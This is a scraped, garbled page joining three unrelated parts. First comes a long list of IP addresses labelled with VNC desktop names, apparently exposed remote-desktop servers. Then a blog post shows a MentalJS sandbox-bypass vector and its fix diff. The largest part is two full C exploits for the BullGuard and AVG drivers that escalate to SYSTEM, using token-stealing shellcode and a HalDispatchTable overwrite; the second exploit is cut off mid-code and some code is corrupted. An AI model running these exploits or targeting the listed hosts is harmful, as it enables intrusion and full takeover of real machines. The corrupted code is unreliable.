null [QEMU (instance 00005eb5)] 115.47.47.74 null [QEMU (instance 0000581e)] 115.47.47.78 null [QEMU (instance 000048f4)] 115.47.47.70 null [QEMU (instance 000048a5)] 115.47.47.79 null [QEMU (instance 0000a89b)] 115.47.47.83 null [QEMU (instance 0000b896)] 115.47.47.82 null [QEMU (instance 00008fc9)] 115.47.47.72 null [QEMU (instance 0000785e)] 115.47.47.71 null [QEMU (instance 0000715b)] 115.47.47.77 null [QEMU (instance 000048db)] 115.47.47.81 null [QEMU (instance 000061e2)] 115.47.47.75 null [QEMU (instance 000048eb)] 115.47.47.84 null [QEMU (instance 00004f48)] 115.31.135.29 null [DELL SERVER6] 221.181.41.85 null 218.149.2.126 null [DBS] 218.151.63.40 null [NATURA FUELCELL] 124.173.70.40 null 122.193.89.146 null [QEMU (fawu)] 122.193.101.26 null [pf veriton 0] 115.240.46.6 null [KAUSHAL] 124.207.116.184 null [QEMU (win2003 1)] 115.241.212.64 null 203.181.96.22 null [kddi@kddi ThinkPad X121e] 203.189.75.58 null [51628 001D] 203.185.97.121 null [QEMU (instance 00000015)] 203.185.97.123 null [QEMU (instance 00000024)] 203.189.96.131 null [x11] 203.171.124.40 null 203.171.228.162 null 203.191.174.12 null 203.193.149.229 null [sIMHADRI] 203.197.88.115 null 203.197.241.61 null [CTLA197] 203.196.0.165 null [QEMU (instance 0000001f)] 203.193.146.146 null 203.202.241.238 null [QEMU (instance 00000002)] 203.200.166.38 null [OSSPCBL] 203.202.246.16 null [LFSQL] 203.208.197.242 null [QEMU (gacd)] 203.213.122.86 null [FS1] 203.206.178.220 null [QEMU (office)] 203.219.103.25 null [aucsair@au1.csair] 203.215.46.146 null [PAROON] 203.212.26.6 null 203.234.223.39 null [°ü¸®¹øÈ£] 203.252.78.199 null 203.253.235.154 null [QEMU (instance 00000056)] 203.253.235.158 null [QEMU (instance 0000003b)] 203.253.235.156 null [QEMU (instance 0000007b)] 204.12.206.194 null [QEMU (win2003)] 204.13.43.106 null [jim@247vtmusicstream] 204.13.110.140 null 204.15.185.26 null 204.16.119.67 null [QEMU (test1)] 204.16.116.126 null [QEMU (ubuntu12_04_test)] 204.11.187.37 null 204.48.122.180 null [LibVNCServer] 204.45.31.34 null [x11] 204.29.243.19 null [ACR2005A] 204.52.43.3 null [vnc server] 204.58.163.95 null 204.74.214.26 null [XenServer Virtual Terminal] 204.83.110.237 null [wombatt@NomNomNom] 204.57.110.39 null 204.13.43.106 null [jim@247vtmusicstream] 204.12.206.194 null [QEMU (win2003)] 204.13.110.140 null 204.15.185.26 null 204.16.119.67 null [QEMU (test1)] 204.16.116.126 null [QEMU (ubuntu12_04_test)] 204.11.187.37 null 204.29.243.19 null [ACR2005A] 204.48.122.180 null [LibVNCServer] 204.45.31.34 null [x11] 204.52.43.3 null [vnc server] 204.58.163.95 null 204.54.115.106 null 204.74.214.26 null [XenServer Virtual Terminal] 204.83.110.237 null [wombatt@NomNomNom] 204.122.16.72 null [x11] 204.122.16.2 null [x11] 204.118.31.126 null [nac@nac server] 60.22.72.19 null [QEMU] 60.12.187.214 null [rfcnpin34 ( 60.12.187.214 ) service mode] 60.32.152.90 null [x11] 60.32.152.92 null [x11] 60.53.244.182 null [mesra@mail.bcom.com.my] 60.55.32.239 null [QEMU (instance 00000006)] 60.56.109.208 null 60.173.161.176 null 60.190.100.214 null 60.191.0.66 null 60.191.187.5 null [LibVNCServer] 60.191.141.77 null 60.196.17.136 null [WindowsCE] 60.196.3.135 null [WindowsCE] 60.196.17.132 null [WindowsCE] 60.196.17.137 null [WindowsCE] 60.196.17.130 null [WindowsCE] 60.196.3.133 null [WindowsCE] 60.196.17.135 null [WindowsCE] 60.196.17.139 null [WindowsCE] 60.196.3.134 null [WindowsCE] 60.196.17.134 null [WindowsCE] 60.196.17.140 null [WindowsCE] 60.196.3.136 null [WindowsCE] 60.196.50.145 null [WindowsCE] 60.196.17.142 null [WindowsCE] 60.196.17.143 null [WindowsCE] 60.196.50.132 null [WindowsCE] 60.196.50.136 null [WindowsCE] 60.196.50.134 null [WindowsCE] 60.196.50.137 null [WindowsCE] 60.196.50.130 null [WindowsCE] 60.196.17.141 null [WindowsCE] 60.196.50.146 null [WindowsCE] 60.196.50.141 null [WindowsCE] 60.196.50.144 null [WindowsCE] 60.196.50.135 null [WindowsCE] 60.196.50.133 null [WindowsCE] 60.196.50.140 null [WindowsCE] 60.196.50.142 null [WindowsCE] 60.196.50.143 null [WindowsCE] 60.196.73.138 null [WindowsCE] 60.196.73.139 null [WindowsCE] 60.196.73.136 null [WindowsCE] 60.196.73.133 null [WindowsCE] 60.196.73.137 null [WindowsCE] 60.196.73.134 null [WindowsCE] 60.196.96.4 null [WindowsCE] 60.196.96.8 null [WindowsCE] 60.196.73.131 null [WindowsCE] 60.196.96.13 null [WindowsCE] 60.196.96.14 null [WindowsCE] 60.196.96.3 null [WindowsCE] 60.196.96.7 null [WindowsCE] 60.196.96.5 null [WindowsCE] 60.196.96.10 null [WindowsCE] 60.196.96.12 null [WindowsCE] 60.197.119.5 null [WindowsCE] 60.196.129.6 null [WindowsCE] 60.196.129.9 null [WindowsCE] 60.197.119.6 null [WindowsCE] 60.196.129.3 null [WindowsCE] 60.197.121.4 null [WindowsCE] 60.197.121.8 null [WindowsCE] 60.197.121.2 null [WindowsCE] 60.197.121.5 null [WindowsCE] 60.197.121.6 null [WindowsCE] 60.197.119.3 null [WindowsCE] 60.197.121.7 null [WindowsCE] 60.197.142.6 null [WindowsCE] 60.197.142.14 null [WindowsCE] 60.197.121.11 null [WindowsCE] 60.197.148.6 null [WindowsCE] 60.197.142.4 null [WindowsCE] 60.197.148.3 null [WindowsCE] 60.197.142.8 null [WindowsCE] 60.197.119.4 null [WindowsCE] 60.197.142.9 null [WindowsCE] 60.197.148.10 null [WindowsCE] 60.197.141.17 null [WindowsCE] 60.197.141.19 null [WindowsCE] 60.197.142.2 null [WindowsCE] 60.197.148.2 null [WindowsCE] 60.197.148.14 null [WindowsCE] 60.197.155.138 null [WindowsCE] 60.197.155.136 null [WindowsCE] 60.197.121.9 null [WindowsCE] 60.197.155.132 null [WindowsCE] 60.197.119.7 null [WindowsCE] 60.197.142.12 null [WindowsCE] 60.197.174.5 null [WindowsCE] 60.197.141.20 null [WindowsCE] 60.197.148.8 null [WindowsCE] 60.197.148.5 null [WindowsCE] 60.197.174.6 null [WindowsCE] 60.197.174.137 null [WindowsCE] 60.197.174.2 null [WindowsCE] 60.197.155.142 null [WindowsCE] 60.197.174.131 null [WindowsCE] 60.197.174.134 null [WindowsCE] 60.197.148.9 null [WindowsCE] 60.197.225.4 null [WindowsCE] 60.197.174.138 null [WindowsCE] 60.197.174.136 null [WindowsCE] 60.197.155.135 null [WindowsCE] 60.197.225.3 null [WindowsCE] 60.197.225.134 null [WindowsCE] 60.197.225.143 null [WindowsCE] 60.197.225.132 null [WindowsCE] 60.197.225.6 null [WindowsCE] 60.197.155.140 null [WindowsCE] 60.197.174.130 null [WindowsCE] 60.197.225.137 null [WindowsCE] 60.197.225.133 null [WindowsCE] 60.197.184.3 null [WindowsCE] 60.197.225.139 null [WindowsCE] 60.197.225.140 null [WindowsCE] 60.197.245.135 null [WindowsCE] 60.197.225.131 null [WindowsCE] 60.197.184.4 null [WindowsCE] 60.197.245.134 null [WindowsCE] 60.197.225.138 null [WindowsCE] 60.197.225.9 null [WindowsCE] 60.197.185.136 null [WindowsCE] 60.197.185.135 null [WindowsCE] 60.197.225.8 null [WindowsCE] 60.197.225.7 null [WindowsCE] 60.197.255.134 null [WindowsCE] 60.197.225.5 null [WindowsCE] 60.197.255.136 null [WindowsCE] 60.197.174.132 null [WindowsCE] 60.197.255.147 null [WindowsCE] 60.197.245.131 null [WindowsCE] 60.197.255.135 null [WindowsCE] 60.197.245.130 null [WindowsCE] 60.197.185.133 null [WindowsCE] 60.197.255.131 null [WindowsCE] 60.197.185.132 null [WindowsCE] 60.197.255.144 null [WindowsCE] 60.197.255.137 null [WindowsCE] 60.197.255.140 null [WindowsCE] 60.197.255.138 null [WindowsCE] 60.197.245.142 null [WindowsCE] 60.197.245.139 null [WindowsCE] 60.197.225.135 null [WindowsCE] 60.197.255.145 null [WindowsCE] 60.197.255.142 null [WindowsCE] 60.197.245.137 null [WindowsCE] 60.197.245.143 null [WindowsCE] 60.197.245.141 null [WindowsCE] 60.197.245.140 null [WindowsCE] 60.197.255.143 null [WindowsCE] 60.197.255.141 null [WindowsCE] 60.215.129.45 null [QEMU (MCP)] 60.199.197.9 null [foxconn@server desktop] 60.197.255.132 null [WindowsCE] 60.229.252.198 1 ok xp camere 60.230.191.57 null 60.234.160.27 null 60.234.210.190 null [nobody's x11 desktop (Lennard 0)] 60.241.229.92 null 60.242.156.124 null [xenos@HTPC] 60.247.29.210 null [LibVNCServer] 60.197.225.141 null 60.248.227.47 null [bluewave@bluewave] 60.249.18.47 null [bluewave@white angle] 60.248.251.187 null 60.250.66.87 null [VBox (DNS_WEB)] 60.250.158.151 null [LibVNCServer] 115.242.207.26 null [DINSHAW] 221.8.101.254 null [QEMU (vm31_5ef89b40 49e8 4579 9f8a 94d603e65875)] 221.7.143.6 null 218.100.84.124 null [NxuCrT4u@AppServer1] 115.248.29.18 null [labserver@labserver]

Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:- _=document x =_.createElement('script'); s =_.createElement('style') s.innerHTML = '*/alert(location)//' t=_.createElement('b') t.textContent = '/*' x.insertBefore(t.firstChild, null); x.insertBefore(s, null) _.body.appendChild(x) x =_.createElement('script'); s =_.createElement('style') s.innerHTML = _.getElementsByTagName('script')[2].textContent x.insertBefore(s.firstChild, null) _.body.appendChild(x) It can actually be compressed to the following: s=document.createElement('script'); s.insertBefore(document.createTextNode('alert(location)'),null); document.body.appendChild(s); The fix was to check if the second argument is null and the parent node is a script. Clean the script and then sandbox the code. Hopefully that will fix the attack, I couldn’t see a way to use insertBefore without a null argument to cause another bypass. @@ -5621,7 +5621,7 @@ } }; - exports.version = "0.1.15"; + exports.version = "0.1.16"; exports.parse = function(){ var js = MentalJS(); }; @@ -5873,9 +5873,7 @@ if(this.tagName && this.tagName.toUpperCase() == 'SCRIPT') { while(this.firstChild) { this.removeChild(this.firstChild); - } - } - if(this.tagName && this.tagName.toUpperCase() === 'SCRIPT') { + } js = MentalJS(); code = document.createTextNode(js.parse({options:{eval:false},code:node.textContent})); script = document.createElement('script'); @@ -5895,7 +5893,18 @@ 'lastChild$': {configurable:true, get:function(){return this.lastChild;}}, 'nextSibling$': {configurable:true, get:function(){return this.nextSibling;}}, 'parentNode$': {configurable:true, get:function(){return this.parentNode;}}, - 'insertBefore$': {configurable:true, writable:false, value:function(){return this.insertBefore.apply(this, arguments);}}, + 'insertBefore$': {configurable:true, writable:false, value:function(newElement, referenceElement){ + var js, script; + if(this.tagName && this.tagName.toUpperCase() == 'SCRIPT' && referenceElement === null) { + while(this.firstChild) { + this.removeChild(this.firstChild); + } + js = MentalJS(); + code = document.createTextNode(js.parse({options:{eval:false},code:newElement.textContent})); + return this.insertBefore(code, null); + } + return this.insertBefore.apply(this, arguments);} + }, 'cloneNode$': {configurable:true, writable:false, value:function(){return this.cloneNode.apply(this, arguments);}}, 'removeChild$': {configurable:true, writable:false, value:function(){return this.removeChild.apply(this, arguments);}}, 'removeAttribute$': {configurable:true, writable:false, value:function(name){ this.removeAttribute(name); }}, @@ -6175,7 +6184,8 @@ Object.defineProperties(HTMLStyleElement.prototype, { 'innerText$': {configurable:true, get:function(){return this.innerText;},set:function(innerText){ this.innerText = innerText; }}, 'textContent$': {configurable:true, get:function(){return this.textContent;},set:function(textContent){this.textContent=textConent;}}, - 'text$': {configurable:true, get:function(){return this.text;},set:function(text){ this.text=text; }} + 'text$': {configurable:true, get:function(){return this.text;},set:function(text){ this.text=text; }}, + 'innerHTML$': {configurable:true, get:function(){return this.innerHTML;},set:function(){ }} }); Object.defineProperties(document, { Source

/* Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.bullguard.com/ Tested Version - 14.1.285.4 Driver Version - 1.0.0.6 - BdAgent.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/114478 CVE ID - CVE-2014-9642 Vendor fix url - http://www.bullguard.com/about/release-notes.aspx Fixed Version - 15.0.288.1 Fixed driver ver - 1.0.0.7 Note ---- Overwritten HAL dispatch table after exploit kd> dps nt!HalDispatchTable l c 8054ccb8 00000003 8054ccbc 00340000 8054ccc0 00010000 8054ccc4 0a060002 8054ccc8 ee657645 8054cccc 00000001 8054ccd0 00000001 8054ccd4 867c1bf0 8054ccd8 80613f7b nt!IoSetPartitionInformation 8054ccdc 806141ef nt!IoWritePartitionTable 8054cce0 8052d157 nt!CcHasInactiveViews 8054cce4 804e42d1 nt!ObpTraceDepth+0x19 7 pointers get overwritten. Since input buffer is in our control and pointers are static in XP I've triggered the overwrite again restoring the pointers. */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots "\x00\x00\x00\x00" // 8054ccc8 00000000 "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters "\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(?, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ?)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "bdagent"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; } Source

/* Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.avg.com/ Tested Version - 2015.0.5315 Driver Version - 15.0.0.5204 - avgtdix.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/113824 CVE ID - CVE-2014-9632 Vendor fix url - http://www.avg.com/eu-en/avg-release-notes Fixed Version - 2015.0.5557 Fixed driver ver - 15.0.0.5553 Note ---- Overwritten HAL dispatch table after exploit kd> dps nt!HalDispatchTable l c 8054ccb8 00000003 8054ccbc 00340000 8054ccc0 8678d9a0 8054ccc4 0a050002 8054ccc8 6e66744e 8054cccc 001c0707 8054ccd0 00000180 8054ccd4 000001a4 8054ccd8 867d6690 8054ccdc 86706480 8054cce0 00000000 8054cce4 804e42d1 nt!ObpTraceDepth+0x19 10 pointers get overwritten. Since input buffer is in our control and pointers are static in XP I've triggered the overwrite again restoring the pointers. */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots "\x00\x00\x00\x00" // 8054ccc8 00000000 "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters "\xe5\x4a\x5c\x80" // 8054ccd4 805c4ae5 nt!IoReadPartitionTable "\x7b\x3f\x61\x80" // 8054ccd8 80613f7b nt!IoSetPartitionInformation "\xef\x41\x61\x80" // 8054ccdc 806141ef nt!IoWritePartitionTable "\x57\xd1\x52\x80"; // 8054cce0 8052d157 nt!CcHasInactiveViews DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(?, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ?)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } 